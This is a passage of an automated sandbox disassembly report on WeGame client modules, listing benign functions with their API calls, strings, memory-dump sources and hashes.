                                                                • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,000002DC), ref: 6BDB591E
                                                                  • Part of subcall function 6BDAB9D8: __EH_prolog3_GS.LIBCMT ref: 6BDAB9DF
                                                                • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,?,?,000002DC), ref: 6BDB5930
                                                                • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,?,?,?,?,000002DC), ref: 6BDB593D
                                                                • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,?,?,?,?,?,?,000002DC), ref: 6BDB594F
                                                                • memset.VCRUNTIME140(?,00000000,00000208,?,?,?,?,?,?,?,?,000002DC), ref: 6BDB5962
                                                                • GetPrivateProfileStringW.KERNEL32(?,?,?,?), ref: 6BDB59CA
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,00000104,?,?,?,?,?,?), ref: 6BDB59D4
                                                                  • Part of subcall function 6BD1A5EF: __EH_prolog3.LIBCMT ref: 6BD1A5F6
                                                                • GetLastError.KERNEL32(00000000,00000005,e:\dailybuild_dev\wegame_client\codes\common\src\sys_wrapper.cpp,00000F91,6C02E7BF,?,?,?,?,?,00000104), ref: 6BDB5A11
                                                                • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 6BDB5A93
                                                                Strings
                                                                • e:\dailybuild_dev\wegame_client\codes\common\src\sys_wrapper.cpp, xrefs: 6BDB59F8
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@U?$char_traits@U?$char_traits@_V?$allocator@V?$allocator@_V?$basic_string@V?$basic_string@_W@std@@$?u8to16@common@ierd_tgp@@D@2@@std@@W@2@@4@@$H_prolog3_$?get_log_instance@base@@?u16to8@common@ierd_tgp@@D@2@@4@@ErrorH_prolog3LastLogger@1@PrivateProfileStringW@2@@std@@memset
                                                                • String ID: e:\dailybuild_dev\wegame_client\codes\common\src\sys_wrapper.cpp
                                                                • API String ID: 1919723385-2520978235
                                                                • Opcode ID: 5298f676a0409b6d6968eeb4b44a19822cff78f36fcc2231af6fc16d3a51112e
                                                                • Instruction ID: 597bb4b13cc7b30c5e6332d0a844deafd82cda3abeb23a40bbcb650e1bfe1c60
                                                                • Opcode Fuzzy Hash: 5298f676a0409b6d6968eeb4b44a19822cff78f36fcc2231af6fc16d3a51112e
                                                                • Instruction Fuzzy Hash: 5D71F1B1C492689ADF64CF64CC99BDDBBB4AF18304F1041DAA40CA72A0DB385F85CF65
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD94B02 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 104COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD94B0C
                                                                • memset.VCRUNTIME140(?,00000000,00000410,0000085C,6BD92947), ref: 6BD94B23
                                                                • memset.VCRUNTIME140(?,00000000,00000410,?,00000000,00000410,0000085C,6BD92947), ref: 6BD94B31
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 6BD94B6B
                                                                • wcsrchr.VCRUNTIME140(?,0000005C), ref: 6BD94B82
                                                                • wcsrchr.VCRUNTIME140(?,0000002F), ref: 6BD94B96
                                                                • __snprintf_s.LIBCMT ref: 6BD94BC0
                                                                • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?,?), ref: 6BD94C11
                                                                • ?file_get_version@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAUversion_t@12@@Z.COMMON(?,?,?), ref: 6BD94C3F
                                                                • ?to_string@version_t@common@ierd_tgp@@QAE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?,?), ref: 6BD94C53
                                                                Strings
                                                                • %s\tcls\protocolcenter.dll, xrefs: 6BD94BAD
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@U?$char_traits@V?$allocator@V?$basic_string@$D@2@@std@@memsetwcsrchr$?file_get_version@common@ierd_tgp@@?to_string@version_t@common@ierd_tgp@@?u16to8@common@ierd_tgp@@D@2@@4@@FileH_prolog3_ModuleNameU?$char_traits@_Uversion_t@12@@V?$allocator@_V?$basic_string@_W@2@@std@@W@std@@__snprintf_s
                                                                • String ID: %s\tcls\protocolcenter.dll
                                                                • API String ID: 2055968945-498237658
                                                                • Opcode ID: 18ad541316c5c7a82fa6f163c1eaed769f75a2f87d57e39f3dc55c98e8578245
                                                                • Instruction ID: eecb881af85832437871dbd2c3928da63d5d1cd5733b3edc6edf3b1c0d6e4eef
                                                                • Opcode Fuzzy Hash: 18ad541316c5c7a82fa6f163c1eaed769f75a2f87d57e39f3dc55c98e8578245
                                                                • Instruction Fuzzy Hash: CF413EB1C0421DDADB64DB70CC81ADEB7F8BF14214F5081EAA048A7151EF399B84CFA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00464261 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 103COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00464268
                                                                  • Part of subcall function 0046E3BC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0040CD71,7FFFFFFE,?), ref: 0046E3D1
                                                                • ??0ShareMemory@Memory@ierd_tgp@@QAE@PB_WK@Z.COMMON(WEGMAE_QBLINK_SHARE_MEMORY_INFO,0000008C,00000058,00462C17,?,?), ref: 00464297
                                                                • ?Create@ShareMemory@Memory@ierd_tgp@@QAEHH@Z.COMMON(00000000,00000058,00462C17,?,?), ref: 004642B3
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000000,00000058,00462C17,?,?), ref: 004642BC
                                                                • ??1ShareMemory@Memory@ierd_tgp@@QAE@XZ.COMMON(00000000,00000058,00462C17,?,?), ref: 0046431C
                                                                • ?GetBuffer@ShareMemory@Memory@ierd_tgp@@QBEPAEXZ.COMMON(00000000,00000058,00462C17,?,?), ref: 00464337
                                                                • _memcpy_s.PGOCR ref: 00464361
                                                                • _memcpy_s.PGOCR ref: 00464382
                                                                Strings
                                                                • WEGMAE_QBLINK_SHARE_MEMORY_INFO, xrefs: 00464290
                                                                • [QBlink]share memory init fail., xrefs: 004642F7
                                                                • e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp, xrefs: 004642E0
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Memory@Memory@ierd_tgp@@Share$_memcpy_s$?get_log_instance@base@@Buffer@Create@H_prolog3_Logger@1@malloc
                                                                • String ID: WEGMAE_QBLINK_SHARE_MEMORY_INFO$[QBlink]share memory init fail.$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp
                                                                • API String ID: 2485382025-1277436582
                                                                • Opcode ID: 4950fdb56852cbd925a8bf8dac0140a39cd6d98e05b64f0aebca82871670aedb
                                                                • Instruction ID: ca53b65570731ac520cb4e7d7739d079969952f626b7385e3a17e93bc0732334
                                                                • Opcode Fuzzy Hash: 4950fdb56852cbd925a8bf8dac0140a39cd6d98e05b64f0aebca82871670aedb
                                                                • Instruction Fuzzy Hash: 7631AE71B00710ABDB20AF66C842B5E73A5AF44714F10491FF955AF3C1FBB8E9418B9A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD4885B Relevance: 18.1, APIs: 12, Instructions: 116COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD48865
                                                                • ?get_cfg_module_path@File_info@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ.COMMON(?,0000008C,6BD4758E,?,000001E8,6BD470FC,?,?), ref: 6BD4887F
                                                                  • Part of subcall function 6BD472C0: __EH_prolog3_GS.LIBCMT ref: 6BD472CA
                                                                  • Part of subcall function 6BD472C0: memset.VCRUNTIME140(?,00000000,00000208,00000214,6BD48884,?,0000008C,6BD4758E,?,000001E8,6BD470FC,?,?), ref: 6BD472F0
                                                                  • Part of subcall function 6BD472C0: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 6BD47305
                                                                  • Part of subcall function 6BD472C0: PathRemoveFileSpecW.SHLWAPI(?), ref: 6BD47312
                                                                  • Part of subcall function 6BD16B70: ?_Execute_once@std@@YAHAAUonce_flag@1@P6GHPAX1PAPAX@Z1@Z.MSVCP140(6C098414,6BD16BB1,6C098418,?,6BD1A235,00000000,?,00000010), ref: 6BD16B81
                                                                  • Part of subcall function 6BD16B70: terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BD16B8D
                                                                • ?absolute@filesystem@ierd_tgp@@YA?AVpath@12@ABV312@0@Z.COMMON(?,?,?,?,0000008C,6BD4758E,?,000001E8,6BD470FC,?,?), ref: 6BD488BA
                                                                  • Part of subcall function 6BD5FD7B: __EH_prolog3_GS.LIBCMT ref: 6BD5FD85
                                                                  • Part of subcall function 6BD5FD7B: ?is_absolute@path@filesystem@ierd_tgp@@QBE_NXZ.COMMON ref: 6BD5FDA8
                                                                  • Part of subcall function 6BD5FD7B: ??0path@filesystem@ierd_tgp@@QAE@$$QAV012@@Z.COMMON(00000000), ref: 6BD5FE1D
                                                                  • Part of subcall function 6BD5FD7B: ?root_name@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,00000000), ref: 6BD5FE8E
                                                                  • Part of subcall function 6BD5FD7B: ?root_name@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,?,00000000), ref: 6BD5FE9E
                                                                  • Part of subcall function 6BD5FD7B: ?root_directory@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,?,?,00000000), ref: 6BD5FEAD
                                                                  • Part of subcall function 6BD5FD7B: ??0path@filesystem@ierd_tgp@@QAE@$$QAV012@@Z.COMMON(?,?,?,?,00000000), ref: 6BD5FEC2
                                                                • ?has_parent_path@path@filesystem@ierd_tgp@@QBE_NXZ.COMMON ref: 6BD488C4
                                                                • ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?), ref: 6BD488D8
                                                                • ?absolute@filesystem@ierd_tgp@@YA?AVpath@12@ABV312@0@Z.COMMON(00000000,?,?,00000000,?), ref: 6BD4890E
                                                                • ?exists@filesystem@ierd_tgp@@YA_NABVpath@12@AAVerror_code@std@@@Z.COMMON(?,?,?,?,?,?,0000008C,6BD4758E,?,000001E8,6BD470FC,?,?), ref: 6BD48922
                                                                • ??0path@filesystem@ierd_tgp@@QAE@$$QAV012@@Z.COMMON(00000000,?,?,?,00000000,?), ref: 6BD48934
                                                                • ?get_cfg_module_path@File_info@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ.COMMON(?), ref: 6BD4897C
                                                                • ?absolute@filesystem@ierd_tgp@@YA?AVpath@12@ABV312@0@Z.COMMON(00000000,?,00000000,?), ref: 6BD4898E
                                                                  • Part of subcall function 6BD5FD7B: ?current_path@filesystem@ierd_tgp@@YA?AVpath@12@XZ.COMMON(?), ref: 6BD5FDE2
                                                                  • Part of subcall function 6BD5FD7B: ?relative_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?), ref: 6BD5FF16
                                                                  • Part of subcall function 6BD5FD7B: ?relative_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,?), ref: 6BD5FF2B
                                                                  • Part of subcall function 6BD5FD7B: ?root_directory@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,?,?), ref: 6BD5FF40
                                                                • ?wstring@path@filesystem@ierd_tgp@@QBE?BV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ.COMMON(?), ref: 6BD489A0
                                                                  • Part of subcall function 6BD1FACF: __EH_prolog3.LIBCMT ref: 6BD1FAD6
                                                                • ??0path@filesystem@ierd_tgp@@QAE@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.COMMON(00000000,?), ref: 6BD489AC
                                                                  • Part of subcall function 6BD1A713: __EH_prolog3.LIBCMT ref: 6BD1A71A
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: V123@$Vpath@12@$??0path@filesystem@ierd_tgp@@$?absolute@filesystem@ierd_tgp@@E@$$H_prolog3_V012@@V312@0@$?get_cfg_module_path@?relative_path@path@filesystem@ierd_tgp@@?root_directory@path@filesystem@ierd_tgp@@?root_name@path@filesystem@ierd_tgp@@FileFile_info@common@ierd_tgp@@H_prolog3U?$char_traits@_V?$allocator@_V?$basic_string@_Vpath@filesystem@3@W@std@@$?current_path@filesystem@ierd_tgp@@?exists@filesystem@ierd_tgp@@?has_parent_path@path@filesystem@ierd_tgp@@?is_absolute@path@filesystem@ierd_tgp@@?parent_path@path@filesystem@ierd_tgp@@?wstring@path@filesystem@ierd_tgp@@Execute_once@std@@ModuleNamePathRemoveSpecUonce_flag@1@Verror_code@std@@@W@2@@std@@W@2@@std@@@memsetterminate
                                                                • String ID:
                                                                • API String ID: 877234165-0
                                                                • Opcode ID: 35f62f434c8de5aab63f0c9b3fa14ee390a44e352abffa85f7eaf09854aac939
                                                                • Instruction ID: 1f034f4c5cdde6d0e24fd80eb867e218a612e42055b5cafd6be62bfe4c9184d6
                                                                • Opcode Fuzzy Hash: 35f62f434c8de5aab63f0c9b3fa14ee390a44e352abffa85f7eaf09854aac939
                                                                • Instruction Fuzzy Hash: 18416EB1C08188EACF21DBF4C941BDDBBB8AF25358F44409AD045AF151EB389B49DBB1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD33892 Relevance: 17.8, APIs: 5, Strings: 5, Instructions: 331stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD3389C
                                                                  • Part of subcall function 6BD33574: __EH_prolog3.LIBCMT ref: 6BD3357B
                                                                • _localtime64_s.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,?,?,?,6BFA11F0,00000000,000002AC), ref: 6BD33B7F
                                                                • strftime.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,?,?,?,6BFA11F0,00000000,000002AC), ref: 6BD33BA6
                                                                • strftime.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?), ref: 6BD33BF8
                                                                • _CxxThrowException.VCRUNTIME140(?,6C03BD5C,missing '}' in format string,?,000002AC), ref: 6BD33C66
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: strftime$ExceptionH_prolog3H_prolog3_Throw_localtime64_s
                                                                • String ID: %Y-%m-%d %H-%M-%S.%f$%Y-%m-%d %H:%M:%S.%f$000000000$000000000$missing '}' in format string
                                                                • API String ID: 3645883216-1246186885
                                                                • Opcode ID: 763c38553a0a72e5625c1a98b0b8ebfb752e4b17cf4272e307fe1f443f9bc2ef
                                                                • Instruction ID: d1d12f509f0c673e10967bf34077f2cf82604bfe027dd5b0d443e7d2e74be6d0
                                                                • Opcode Fuzzy Hash: 763c38553a0a72e5625c1a98b0b8ebfb752e4b17cf4272e307fe1f443f9bc2ef
                                                                • Instruction Fuzzy Hash: 20C1D771A04219DFCB24CFA8C994BDDB7B5FF0A324F140199E049AB292DB749E81CF61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD39C91 Relevance: 17.8, APIs: 5, Strings: 5, Instructions: 309COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD39C9B
                                                                • SHCreateDirectoryExW.SHELL32(00000000,-00000024,00000000,?,?,?,?,wegame,000000A8), ref: 6BD39DF2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CreateDirectoryH_prolog3_
                                                                • String ID: .log$\memlog$mem$memlog$wegame
                                                                • API String ID: 286309480-2121784790
                                                                • Opcode ID: 6c112cd31d8edbb9b8803e7b6150d7c05ab41b5255551771592ae90cfa3726f7
                                                                • Instruction ID: d6122224f3c48e7476b7e42f6e3a200248c7c8c05a740e9a1ceba6bdd5e10da5
                                                                • Opcode Fuzzy Hash: 6c112cd31d8edbb9b8803e7b6150d7c05ab41b5255551771592ae90cfa3726f7
                                                                • Instruction Fuzzy Hash: 9EC1CF71905258EFDF14DFB4C841BDEBBB8AF16318F14409DE445AB282DB389B49CB62
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD30F05 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 109threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD30F0F
                                                                  • Part of subcall function 6BD31B55: __EH_prolog3_GS.LIBCMT ref: 6BD31B5C
                                                                • memset.VCRUNTIME140(?,00000000,00000100,?,?), ref: 6BD30FA8
                                                                • GetCurrentProcessId.KERNEL32(00000048,6BD31689,6BD43A1D), ref: 6BD30FB0
                                                                  • Part of subcall function 6BD104F0: __stdio_common_vsprintf_s.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000020,?,6BD108F4,00000000,?,?,6BD108F4,?,00000020,%#.16g,?,00000010), ref: 6BD1050C
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 6BD30FDE
                                                                • CreateThread.KERNEL32(00000000,00000000,6BD3109D,?,00000000,?), ref: 6BD31008
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6BD31011
                                                                  • Part of subcall function 6BD1A5EF: __EH_prolog3.LIBCMT ref: 6BD1A5F6
                                                                  • Part of subcall function 6BD1E945: __EH_prolog3_catch_GS.LIBCMT ref: 6BD1E94C
                                                                Strings
                                                                • [Async_task_mgr]AppendNewThread task_thread_id:%d, true thread_id:%d, xrefs: 6BD31058
                                                                • e:\dailybuild_dev\wegame_client\codes\common\src\async_task.cpp, xrefs: 6BD31035
                                                                • %lu_ASYNC_TASK_MGR_EV_%u_, xrefs: 6BD30FB8
                                                                • 0/#v, xrefs: 6BD30FDE
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CreateH_prolog3_$?get_log_instance@base@@CurrentEventH_prolog3H_prolog3_catch_Logger@1@ProcessThread__stdio_common_vsprintf_smemset
                                                                • String ID: %lu_ASYNC_TASK_MGR_EV_%u_$0/#v$[Async_task_mgr]AppendNewThread task_thread_id:%d, true thread_id:%d$e:\dailybuild_dev\wegame_client\codes\common\src\async_task.cpp
                                                                • API String ID: 217801211-3216557929
                                                                • Opcode ID: 2c917ebadf7f13dff13f6ccfc52a9780a5d5895e4fb32e3e21b26be4a41cdeb0
                                                                • Instruction ID: 43b928a52f2a7246d2498f7358074e41b67e70d171bd4ce93a0ea26666120d1d
                                                                • Opcode Fuzzy Hash: 2c917ebadf7f13dff13f6ccfc52a9780a5d5895e4fb32e3e21b26be4a41cdeb0
                                                                • Instruction Fuzzy Hash: B741AE71D04268AFDB11DF78CC41BDABBB4BB1A314F1041D9E548AB291DB759E84CFA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0045F8E3 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 66COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ?is_static_detail_log@common@ierd_tgp@@YA_NXZ.COMMON(?), ref: 0045F8EF
                                                                • ?GetLastLoginedWegameId@common@ierd_tgp@@YAIXZ.COMMON(?), ref: 0045F8FB
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0045F920
                                                                • ?get_client_version_type@overseas@ierd_tgp@@YAHXZ.COMMON(?,?,?,?,00459F30,00000000,?), ref: 0045F92C
                                                                • ?get_client_version_type@overseas@ierd_tgp@@YAHXZ.COMMON(?,?,?,?,00459F30,00000000,?), ref: 0045F93D
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0045F94F
                                                                • ?Instance@CrashReportLoader@crash_report@@SAAAV12@XZ.ADAPT_FOR_IMPORTS ref: 0045F975
                                                                • ?Init@CrashReportLoader@crash_report@@QAEXPB_W_K1HP6GHPAUtagCrashReportHelperCallbackInfo@@@Z0@Z.ADAPT_FOR_IMPORTS(?,00000000,00000000,0000000A,00000004,00000000,0045EA47,?), ref: 0045F9A1
                                                                • ?stamp_point@@YAXPBD@Z.COMMON(CrashReportLoaderInit end), ref: 0045F9AC
